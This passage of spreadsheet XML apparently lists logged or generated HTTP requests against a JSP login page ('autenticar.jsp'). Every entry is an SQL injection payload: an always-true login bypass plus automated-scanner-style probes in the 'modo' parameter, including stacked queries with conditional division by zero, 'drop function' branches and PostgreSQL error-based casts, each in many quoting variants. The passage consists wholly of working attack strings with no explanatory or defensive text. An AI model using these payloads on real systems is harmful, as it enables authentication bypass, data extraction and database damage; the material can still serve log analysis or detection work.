    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2124';select(casewhen(6193=6193)then6193else1/(select0)end);--and'xhay'='xhay</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6902';select(casewhen(5093=2237)then5093else1/(select0)end);--and'jccb'='jccb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9356</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6939');select(casewhen(4947=3497)then4947else1/(select0)end);--and('qoaz'like'qoaz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5326');select(casewhen(6193=6193)then6193else1/(select0)end);--and('lndh'like'lndh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3868');select(casewhen(8346=551)then8346else1/(select0)end);--and('hlvb'like'hlvb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8505</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4914'));select(casewhen(2236=428)then2236else1/(select0)end);--and(('psdk'like'psdk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7678'));select(casewhen(6193=6193)then6193else1/(select0)end);--and(('cdeg'like'cdeg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7939'));select(casewhen(5701=1470)then5701else1/(select0)end);--and(('ogwp'like'ogwp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4355</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5515')));select(casewhen(7601=1546)then7601else1/(select0)end);--and((('pwzu'like'pwzu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4704')));select(casewhen(6193=6193)then6193else1/(select0)end);--and((('nezf'like'nezf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9318')));select(casewhen(8987=7201)then8987else1/(select0)end);--and((('suys'like'suys</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9613</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9068';select(casewhen(2444=1248)then2444else1/(select0)end);--and'qksl'like'qksl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5682';select(casewhen(6193=6193)then6193else1/(select0)end);--and'ypfl'like'ypfl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5854';select(casewhen(9166=7745)then9166else1/(select0)end);--and'ghxp'like'ghxp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5657</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5378");select(casewhen(2560=6868)then2560else1/(select0)end);--and("oppk"="oppk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1639");select(casewhen(6193=6193)then6193else1/(select0)end);--and("xmsp"="xmsp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4707");select(casewhen(3416=4867)then3416else1/(select0)end);--and("pmeb"="pmeb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6363</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2520"));select(casewhen(398=4038)then398else1/(select0)end);--and(("lsfp"="lsfp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6082"));select(casewhen(6193=6193)then6193else1/(select0)end);--and(("rtuv"="rtuv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1091"));select(casewhen(1327=8741)then1327else1/(select0)end);--and(("mdqr"="mdqr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8265</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5563")));select(casewhen(985=5253)then985else1/(select0)end);--and((("yckn"="yckn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-873")));select(casewhen(6193=6193)then6193else1/(select0)end);--and((("rcrs"="rcrs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8111")));select(casewhen(9328=3086)then9328else1/(select0)end);--and((("btsa"="btsa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7852</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9585";select(casewhen(7340=9590)then7340else1/(select0)end);--and"daez"="daez</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2596";select(casewhen(6193=6193)then6193else1/(select0)end);--and"jdkj"="jdkj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1462";select(casewhen(5592=7368)then5592else1/(select0)end);--and"kmaq"="kmaq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5289</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2830");select(casewhen(5211=1386)then5211else1/(select0)end);--and("anxf"like"anxf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8651");select(casewhen(6193=6193)then6193else1/(select0)end);--and("cvxy"like"cvxy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6675");select(casewhen(4900=5325)then4900else1/(select0)end);--and("gcpl"like"gcpl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-630</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7116"));select(casewhen(2221=2475)then2221else1/(select0)end);--and(("ohhg"like"ohhg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-415"));select(casewhen(6193=6193)then6193else1/(select0)end);--and(("hcxw"like"hcxw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9972"));select(casewhen(2595=6708)then2595else1/(select0)end);--and(("gbxi"like"gbxi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4559</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7196")));select(casewhen(5554=6264)then5554else1/(select0)end);--and((("ekev"like"ekev</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9679")));select(casewhen(6193=6193)then6193else1/(select0)end);--and((("qmjp"like"qmjp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2035")));select(casewhen(3289=9615)then3289else1/(select0)end);--and((("ycxa"like"ycxa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9611</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-298";select(casewhen(1087=1133)then1087else1/(select0)end);--and"vjmn"like"vjmn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4530";select(casewhen(6193=6193)then6193else1/(select0)end);--and"qtia"like"qtia</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5226";select(casewhen(1434=8643)then1434else1/(select0)end);--and"ecrc"like"ecrc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);if(3723=4531)select3723elsedropfunctionklvb;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);if(2040=2040)select2040elsedropfunctionqhzg;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);if(2173=1980)select2173elsedropfunctionywzg;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if(4498=3521)select4498elsedropfunctionzfos;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if(2040=2040)select2040elsedropfunctionqhzg;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if(6960=306)select6960elsedropfunctionrwyt;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if(7044=6818)select7044elsedropfunctionmbja;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if(2040=2040)select2040elsedropfunctionqhzg;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if(7399=301)select7399elsedropfunctionfdqi;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if(9805=9479)select9805elsedropfunctionbloz;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if(2040=2040)select2040elsedropfunctionqhzg;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if(1582=4260)select1582elsedropfunctiondsny;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);if(8220=3248)select8220elsedropfunctionbrme;--and(3473=3473</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);if(2040=2040)select2040elsedropfunctionqhzg;--and(5108=5108</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);if(8761=9661)select8761elsedropfunctionnqqp;--and(8833=8833</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));if(4942=2980)select4942elsedropfunctiontaxc;--and((2731=2731</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));if(2040=2040)select2040elsedropfunctionqhzg;--and((8541=8541</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));if(6163=7096)select6163elsedropfunctionbsnj;--and((9031=9031</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));if(6977=694)select6977elsedropfunctionpplw;--and(((1255=1255</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));if(2040=2040)select2040elsedropfunctionqhzg;--and(((3565=3565</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));if(8074=3433)select8074elsedropfunctionsfht;--and(((2287=2287</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;if(1715=7388)select1715elsedropfunctiondsvn;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;if(2040=2040)select2040elsedropfunctionqhzg;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;if(9850=9149)select9850elsedropfunctionnwko;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if(5929=1282)select5929elsedropfunctionbuzu;--and('jbgw'='jbgw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if(2040=2040)select2040elsedropfunctionqhzg;--and('jacy'='jacy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if(9601=9368)select9601elsedropfunctionzttq;--and('sgpz'='sgpz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));if(8123=7389)select8123elsedropfunctionfvdq;--and(('dyjm'='dyjm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));if(2040=2040)select2040elsedropfunctionqhzg;--and(('ycuu'='ycuu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));if(2569=5704)select2569elsedropfunctioniobd;--and(('bqnj'='bqnj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));if(8774=2767)select8774elsedropfunctionjcpg;--and((('rxkr'='rxkr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));if(2040=2040)select2040elsedropfunctionqhzg;--and((('ncwb'='ncwb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));if(1=3018)select1elsedropfunctionriio;--and((('wbwc'='wbwc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if(2914=1510)select2914elsedropfunctionathg;--and'knht'='knht</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if(2040=2040)select2040elsedropfunctionqhzg;--and'drqv'='drqv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if(4830=8861)select4830elsedropfunctionoufk;--and'ente'='ente</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if(3395=5249)select3395elsedropfunctionyyar;--and('buso'like'buso</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if(2040=2040)select2040elsedropfunctionqhzg;--and('qbtg'like'qbtg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if(5545=9951)select5545elsedropfunctioncgav;--and('cprn'like'cprn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));if(6005=11)select6005elsedropfunctionivxs;--and(('ztqe'like'ztqe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));if(2040=2040)select2040elsedropfunctionqhzg;--and(('qjkp'like'qjkp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));if(301=3591)select301elsedropfunctionmiyf;--and(('dqcc'like'dqcc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));if(8752=3468)select8752elsedropfunctionnrxe;--and((('svsw'like'svsw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));if(2040=2040)select2040elsedropfunctionqhzg;--and((('kvuh'like'kvuh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));if(7922=8734)select7922elsedropfunctionlhiv;--and((('reoa'like'reoa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if(3182=7253)select3182elsedropfunctionbjqk;--and'baoq'like'baoq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if(2040=2040)select2040elsedropfunctionqhzg;--and'cxql'like'cxql</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if(8225=2699)select8225elsedropfunctiontodj;--and'flor'like'flor</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");if(8318=6235)select8318elsedropfunctionjekf;--and("srdp"="srdp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");if(2040=2040)select2040elsedropfunctionqhzg;--and("ctlw"="ctlw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");if(3493=218)select3493elsedropfunctionxkdo;--and("hyyo"="hyyo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));if(1981=2772)select1981elsedropfunctionqcyn;--and(("sach"="sach</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));if(2040=2040)select2040elsedropfunctionqhzg;--and(("toys"="toys</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));if(9973=3131)select9973elsedropfunctiontltz;--and(("tequ"="tequ</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));if(3726=1724)select3726elsedropfunctiondgcb;--and((("ujpe"="ujpe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));if(2040=2040)select2040elsedropfunctionqhzg;--and((("hgoe"="hgoe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));if(4405=3183)select4405elsedropfunctionrdfa;--and((("iqlx"="iqlx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if(7931=3513)select7931elsedropfunctionwgjp;--and"wlse"="wlse</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if(2040=2040)select2040elsedropfunctionqhzg;--and"wvwa"="wvwa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if(3504=1700)select3504elsedropfunctionprch;--and"npam"="npam</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");if(4523=2896)select4523elsedropfunctiondoux;--and("hdfz"like"hdfz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");if(2040=2040)select2040elsedropfunctionqhzg;--and("mnme"like"mnme</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");if(2391=4769)select2391elsedropfunctiongvkq;--and("euga"like"euga</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));if(6882=9973)select6882elsedropfunctionbfwe;--and(("ypxv"like"ypxv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));if(2040=2040)select2040elsedropfunctionqhzg;--and(("ckje"like"ckje</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));if(6268=3448)select6268elsedropfunctiongwly;--and(("uiss"like"uiss</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));if(7929=478)select7929elsedropfunctiontoub;--and((("lprt"like"lprt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));if(2040=2040)select2040elsedropfunctionqhzg;--and((("bdcx"like"bdcx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));if(3007=3242)select3007elsedropfunctionrmpb;--and((("sdff"like"sdff</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if(391=5612)select391elsedropfunctiontydo;--and"hvma"like"hvma</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if(2040=2040)select2040elsedropfunctionqhzg;--and"xppd"like"xppd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if(1464=6689)select1464elsedropfunctionvslp;--and"lgvf"like"lgvf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(5595=5595</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and((8882=8882</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and(((2117=2117</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and8051=cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8051=8051)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric)and('glzf'='glzf</t>
  </si>
  <si>
